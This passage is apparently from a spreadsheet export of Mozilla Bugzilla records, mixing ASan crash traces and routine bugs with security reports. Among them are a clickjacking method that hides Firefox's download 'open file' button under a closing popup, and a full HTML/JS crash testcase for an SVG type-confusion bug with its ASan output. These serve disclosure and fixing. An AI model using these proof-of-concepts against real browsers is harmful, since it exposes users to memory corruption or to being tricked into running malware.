    #11 0x7fe86c8c91a0 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7fe86c8d016f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:967:12
    #13 0x7fe875d56a24 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7fe875d56a24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:469
    #15 0x7fe875d3faa5 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:520:12
    #16 0x7fe875d3faa5 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3064
    #17 0x7fe875d26b19 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
    #18 0x7fe875d56bbc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:487:15
    #19 0x7fe875d57512 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:533:10
    #20 0x7fe876751983 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2890:12
    #21 0x7fe86c7eb28b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7fe875d56a24 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7fe875d56a24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:469
    #24 0x7fe875d3faa5 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:520:12
    #25 0x7fe875d3faa5 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3064
    #26 0x7fe875d26b19 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
    #27 0x7fe875d56bbc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:487:15
    #28 0x7fe875d57512 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:533:10
    #29 0x7fe876a095be in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
    #30 0x7fe8769bce19 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
    #31 0x7fe8769e98a3 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
    #32 0x7fe8769ec267 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
    #33 0x7fe875d56e6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #34 0x7fe875d56e6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:451
    #35 0x7fe875d3faa5 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:520:12
    #36 0x7fe875d3faa5 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3064
    #37 0x7fe875d26b19 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
    #38 0x7fe875d59337 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:698:15
previously allocated by thread T0 (Web Content) here:
    #0 0x4bba1c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ecf3d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fe8710fff27 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:200:12
    #3 0x7fe8710fff27 in nsXMLContentSink::FlushText(bool) /home/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:772
    #4 0x7fe871101bee in nsXMLContentSink::HandleEndElement(char16_t const*, bool) /home/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:1038:3
    #5 0x7fe86cbac6d1 in HandleEndElement /home/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:395:26
    #6 0x7fe86cbac6d1 in Driver_HandleEndElement(void*, char16_t const*) /home/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:76
    #7 0x7fe87367118a in doContent /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:2554:11
    #8 0x7fe87366565a in contentProcessor /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:2098:27
    #9 0x7fe87366565a in doProlog /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:4078
    #10 0x7fe87365c0bd in prologProcessor /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:3812:10
    #11 0x7fe87365c0bd in prologInitProcessor /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:3629
    #12 0x7fe87365a391 in MOZ_XML_Parse /home/worker/workspace/build/src/parser/expat/lib/xmlparse.c:1530:17
    #13 0x7fe86cba7897 in nsExpatDriver::ParseBuffer(char16_t const*, unsigned int, bool, unsigned int*) /home/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:1012:16
    #14 0x7fe86cba8b42 in nsExpatDriver::ConsumeToken(nsScanner&amp;, bool&amp;) /home/worker/workspace/build/src/parser/htmlparser/nsExpatDriver.cpp:1110:5
    #15 0x7fe86cbb56d0 in nsParser::Tokenize(bool) /home/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1539:30
    #16 0x7fe86cbb0f15 in nsParser::ResumeParse(bool, bool, bool) /home/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1056:41
    #17 0x7fe86cbb68ea in nsParser::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /home/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1437:12
    #18 0x7fe86b12ab5b in nsBaseChannel::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /home/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:902:28
    #19 0x7fe86b1795d4 in nsInputStreamPump::OnStateTransfer() /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:615:33
    #20 0x7fe86b1782c8 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:443:25
    #21 0x7fe86af7115d in nsInputStreamReadyEvent::Run() /home/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #22 0x7fe86afa8c60 in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:356:25
    #23 0x7fe86afd64ce in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1446:14
    #24 0x7fe86afdc748 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:480:10
    #25 0x7fe86bdee181 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #26 0x7fe86bd4b64b in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #27 0x7fe86bd4b64b in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #28 0x7fe86bd4b64b in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #29 0x7fe87159c08f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #30 0x7fe875873c77 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:882:22
    #31 0x7fe86bd4b64b in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #32 0x7fe86bd4b64b in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #33 0x7fe86bd4b64b in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #34 0x7fe8758736e0 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #35 0x4eb843 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #36 0x4eb843 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:285
    #37 0x7fe8888e182f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsINode.h:1602:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c188002ab90: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c188002aba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c188002abb0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c188002abc0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c188002abd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
=&gt;0x0c188002abe0: fa fa fa fa fa fa fa fa fd fd fd[fd]fd fd fd fd
  0x0c188002abf0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c188002ac00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c188002ac10: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c188002ac20: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c188002ac3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6027==ABORTING</t>
        </is>
      </c>
      <c r="X429" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="430">
      <c r="A430" t="n">
        <v>1116385</v>
      </c>
      <c r="B430" t="inlineStr">
        <is>
          <t>2014-12-29 21:34:20 -0800</t>
        </is>
      </c>
      <c r="C430" t="inlineStr">
        <is>
          <t>Download "open file" dialog delay is too quick when it is under a popup which closes, doesn't prevent clickjacking</t>
        </is>
      </c>
      <c r="D430" t="inlineStr">
        <is>
          <t>2024-06-02 18:39:56 -0700</t>
        </is>
      </c>
      <c r="E430" t="n">
        <v>1</v>
      </c>
      <c r="F430" t="n">
        <v>1</v>
      </c>
      <c r="G430" t="n">
        <v>3</v>
      </c>
      <c r="H430" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I430" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J430" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K430" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L430" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M430" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N430" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O430" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P430" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+]</t>
        </is>
      </c>
      <c r="Q430" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R430" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S430" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T430" t="n">
        <v>1</v>
      </c>
      <c r="U430" t="n">
        <v>0</v>
      </c>
      <c r="V430" t="n">
        <v>20</v>
      </c>
      <c r="W430" t="inlineStr">
        <is>
          <t>Created attachment 8542410
TESTCASE1.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0) Gecko/20100101 Firefox/35.0
Build ID: 20141222200458
Steps to reproduce:
This new Mozilla Firefox Vulnerability is similar than a last moderate vulnerability that i have reported (Fixed in Mozilla Firefox 27)  which is the "MFSA 2014-03" : Bug 916726 .
Steps :
1 : Firstly , Click on the "CLICKME" link on this page (a download "open file" dialog will be loaded with a popup which will cover this one).
2 : Into the popup loaded (which cover the download dialog) , you should double-click on the "DOUBLECLICK" button.
Note : 
- If the testcase do not works the 1st time , please retry , and normally it will work.
- If the testcase do not works the 2nd time , please retry again until it works , but normally it works directly the first time.
Actual results:
- With the 1st click of the double click , the popup will be closed , using window.close(). 
- The 2nd click goes download and execute the .dmg file into the download dialog by pressing to the "open file" button which hasn't a delay of security. 
The method used in this vulnerability is that the "DOUBLECLICK" button is at same place into the popup loaded than the "open file" button of the download dialog which is under this malicious popup , and the when a download dialog is loaded and is cover by a popup, if you close this popup , this dialog don't load a security delay to protect user of clickjacking ).
More information :
When a malicious .dmg is executed , it can appear like Mozilla Firefox containing a fake webpage with a malicious .pkg file (or others) which can be named "double click me" , "Open me to update firefox" or what a malicious hacker want for mislead Firefox lambda user to execute this dangerous file and take the control of its computer. 
( I will make a screen video capture for show you the severity of this new vulnerability ).
Expected results:
If the testcase do not works the 1st time , please retry , and normally it will work.
If the testcase do not works the 2nd time , please retry again until it works , but normally it works directly the first time.</t>
        </is>
      </c>
      <c r="X430" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="431">
      <c r="A431" t="n">
        <v>686044</v>
      </c>
      <c r="B431" t="inlineStr">
        <is>
          <t>2011-09-09 16:14:33 -0700</t>
        </is>
      </c>
      <c r="C431" t="inlineStr">
        <is>
          <t>Crash with after path.pathSegList.appendItem and GC</t>
        </is>
      </c>
      <c r="D431" t="inlineStr">
        <is>
          <t>2012-01-19 11:22:28 -0800</t>
        </is>
      </c>
      <c r="E431" t="n">
        <v>1</v>
      </c>
      <c r="F431" t="n">
        <v>1</v>
      </c>
      <c r="G431" t="n">
        <v>3</v>
      </c>
      <c r="H431" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I431" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J431" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K431" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L431" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M431" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N431" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O431" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P431" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q431" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R431" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S431" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T431" t="n">
        <v>1</v>
      </c>
      <c r="U431" t="n">
        <v>0</v>
      </c>
      <c r="V431" t="n">
        <v>26</v>
      </c>
      <c r="W431" t="inlineStr">
        <is>
          <t>Created attachment 559609
testcase (crashes Firefox within a few seconds)
Security-sensitive becase:
* It's scary that GC is involved,
* the reduced testcase mysteriously requires a loop,
* I saw an (unsafe) "invalid array index" once.</t>
        </is>
      </c>
      <c r="X431" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="432">
      <c r="A432" t="n">
        <v>288688</v>
      </c>
      <c r="B432" t="inlineStr">
        <is>
          <t>2005-04-01 13:40:07 -0800</t>
        </is>
      </c>
      <c r="C432" t="inlineStr">
        <is>
          <t>JS "lambda" replace exposes malloc heap space after end of JS string</t>
        </is>
      </c>
      <c r="D432" t="inlineStr">
        <is>
          <t>2007-03-22 23:00:02 -0700</t>
        </is>
      </c>
      <c r="E432" t="n">
        <v>1</v>
      </c>
      <c r="F432" t="n">
        <v>1</v>
      </c>
      <c r="G432" t="n">
        <v>3</v>
      </c>
      <c r="H432" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I432" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J432" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K432" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N432" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O432" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P432" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q432" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R432" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S432" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T432" t="n">
        <v>1</v>
      </c>
      <c r="U432" t="n">
        <v>1</v>
      </c>
      <c r="V432" t="n">
        <v>23</v>
      </c>
      <c r="W432" t="inlineStr">
        <is>
          <t>Quick and dirty patch next.  There's a better patch that should be done, but the
patch I'll attach next fixes this, AFAICT.
/be</t>
        </is>
      </c>
      <c r="X432" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="433">
      <c r="A433" t="n">
        <v>1616584</v>
      </c>
      <c r="B433" t="inlineStr">
        <is>
          <t>2020-02-19 07:13:34 -0800</t>
        </is>
      </c>
      <c r="C433" t="inlineStr">
        <is>
          <t>Run `mach mozregression` with Python 3</t>
        </is>
      </c>
      <c r="D433" t="inlineStr">
        <is>
          <t>2020-03-20 21:03:26 -0700</t>
        </is>
      </c>
      <c r="E433" t="n">
        <v>1</v>
      </c>
      <c r="F433" t="n">
        <v>1</v>
      </c>
      <c r="G433" t="n">
        <v>7</v>
      </c>
      <c r="H433" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I433" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J433" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K433" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L433" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M433" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N433" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O433" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P433" t="inlineStr"/>
      <c r="Q433" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R433" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S433" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T433" t="n">
        <v>1</v>
      </c>
      <c r="U433" t="n">
        <v>0</v>
      </c>
      <c r="V433" t="n">
        <v>9</v>
      </c>
      <c r="W433" t="inlineStr">
        <is>
          <t>The mozregression module is Python 3 compatible and the mach wrapper around it is very thin. We should be able to enable it under Python 3 fairly easily.
To do so, remove "mozregression" from the whitelist in the root "mach" driver. Then run `./mach mozregression` with various arguments to test that everything is working.</t>
        </is>
      </c>
      <c r="X433" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="434">
      <c r="A434" t="n">
        <v>846386</v>
      </c>
      <c r="B434" t="inlineStr">
        <is>
          <t>2013-02-28 10:30:52 -0800</t>
        </is>
      </c>
      <c r="C434" t="inlineStr">
        <is>
          <t>update kb email templates and rendering for l10n</t>
        </is>
      </c>
      <c r="D434" t="inlineStr">
        <is>
          <t>2013-03-05 07:45:33 -0800</t>
        </is>
      </c>
      <c r="E434" t="n">
        <v>1</v>
      </c>
      <c r="F434" t="n">
        <v>1</v>
      </c>
      <c r="G434" t="n">
        <v>5</v>
      </c>
      <c r="H434" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I434" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J434" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K434" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L434" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M434" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N434" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O434" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P434" t="inlineStr">
        <is>
          <t>u=dev c=general p=3 s=2013.4</t>
        </is>
      </c>
      <c r="Q434" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R434" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S434" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T434" t="n">
        <v>1</v>
      </c>
      <c r="U434" t="n">
        <v>0</v>
      </c>
      <c r="V434" t="n">
        <v>5</v>
      </c>
      <c r="W434" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #839157 +++
In bug #827649, I updated the email templates for the users and questions apps so that they can be localized. Bug #839157 coves updating all the templates, but I'm going to reduce the scope of that one by half.
This bug will cover updating these templates:
./wiki/templates/wiki/email/ready_for_review.ltxt
./wiki/templates/wiki/email/approved.ltxt
./wiki/templates/wiki/email/reviewed.ltxt
./wiki/templates/wiki/email/ready_for_l10n.ltxt
./wiki/templates/wiki/email/reviewed_contributors.ltxt
./wiki/templates/wiki/email/edited.ltxt
For each of these, the following needs to happen:
1. convert the template from Django to Jinja2
2. fix the code that renders the template to use the functions in sumo.email_utils rather than Django template renderer
3. test vigorously!
Take a look at the rendering code for email templates in the users and questions apps for examples.</t>
        </is>
      </c>
      <c r="X434" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="435">
      <c r="A435" t="n">
        <v>393410</v>
      </c>
      <c r="B435" t="inlineStr">
        <is>
          <t>2007-08-23 07:48:35 -0700</t>
        </is>
      </c>
      <c r="C435" t="inlineStr">
        <is>
          <t>reftest should be able to create a (temporary) profile with appropriate prefs</t>
        </is>
      </c>
      <c r="D435" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E435" t="n">
        <v>1</v>
      </c>
      <c r="F435" t="n">
        <v>1</v>
      </c>
      <c r="G435" t="n">
        <v>5</v>
      </c>
      <c r="H435" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I435" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J435" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K435" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N435" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O435" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P435" t="inlineStr"/>
      <c r="Q435" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R435" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S435" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T435" t="n">
        <v>1</v>
      </c>
      <c r="U435" t="n">
        <v>0</v>
      </c>
      <c r="V435" t="n">
        <v>24</v>
      </c>
      <c r="W435" t="inlineStr">
        <is>
          <t>the reftest portion of the unittest suite relies on certain options being present in the profile. Currently, we've been setting these up manually, but we need a buildstep in buildbot to create the profile on first run. Bonus points: Destroy the profile after use.
Required profile options:
user_pref("browser.dom.window.dump.enabled", true);
user_pref("browser.sessionstore.enabled", false);
user_pref("javascript.options.showInConsole", true);
user_pref("layout.fire_onload_after_image_background_loads", true);
Currently, these are being run from the "default" profile. If this is changed to a new profile name, MozillaReftest step will have to be updated to reflect that.</t>
        </is>
      </c>
      <c r="X435" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="436">
      <c r="A436" t="n">
        <v>1365189</v>
      </c>
      <c r="B436" t="inlineStr">
        <is>
          <t>2017-05-16 00:18:06 -0700</t>
        </is>
      </c>
      <c r="C436" t="inlineStr">
        <is>
          <t>type confusion in mozilla::SVGGeometryFrame::GetCanvasTM</t>
        </is>
      </c>
      <c r="D436" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:27 -0700</t>
        </is>
      </c>
      <c r="E436" t="n">
        <v>1</v>
      </c>
      <c r="F436" t="n">
        <v>1</v>
      </c>
      <c r="G436" t="n">
        <v>3</v>
      </c>
      <c r="H436" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I436" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J436" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K436" t="inlineStr">
        <is>
          <t>30 Branch</t>
        </is>
      </c>
      <c r="L436" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M436" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N436" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O436" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P436" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q436" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R436" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S436" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T436" t="n">
        <v>1</v>
      </c>
      <c r="U436" t="n">
        <v>0</v>
      </c>
      <c r="V436" t="n">
        <v>39</v>
      </c>
      <c r="W436" t="inlineStr">
        <is>
          <t>Created attachment 8868038
crash.html (testcase, crashes firefox)
The following testcase crashes the latest ASAN build of Firefox.
&lt;script&gt;
function start() {
	o0=document.createElement('iframe');
	o0.src="data:text/html,&lt;html&gt;&lt;svg xmlns='http://www.w3.org/2000/svg'&gt;&lt;/svg&gt;&lt;/html&gt;";
	o0.addEventListener('load', fun0,false);
	document.body.appendChild(o0);
	o3=document;
}
function fun0() {
	o6=o0.contentDocument;
	o7=o6.getElementsByTagName('*')[3];
	o316=document.documentElement;
	o3.designMode='on';
	document.replaceChild(o6.documentElement,window.top.document.documentElement);
	o1024=document.createElementNS('http://www.w3.org/2000/svg','filter');
	o1024.setAttribute('id','id0');
	o1031=document.createElementNS('http://www.w3.org/2000/svg','feMerge');
	o1039=document.createElementNS('http://www.w3.org/2000/svg','feMergeNode');
	o1031.appendChild(o1039);
	o1024.appendChild(o1031);
	o7.appendChild(o1024);
	o1039.style.filter='url(#id0)';
	o316.style.filter='url(#id7)';
	o1039.id='id20';
	o610=document.createElement('style');
        o611=document.createTextNode("*{ background: -moz-element(#id20);");
        o610.appendChild(o611);
	document.documentElement.appendChild(o610);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==28350==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd26840d038 at pc 0x7fd2615b5745 bp 0x7fff4bdc59b0 sp 0x7fff4bdc59a8
READ of size 8 at 0x7fd26840d038 thread T0 (Web Content)
    #0 0x7fd2615b5744 in mozilla::SVGGeometryFrame::GetCanvasTM() /home/worker/workspace/build/src/layout/svg/SVGGeometryFrame.cpp:701:52
    #1 0x7fd2616446ac in nsSVGUtils::GetCanvasTM(nsIFrame*) /home/worker/workspace/build/src/layout/svg/nsSVGUtils.cpp:428:50
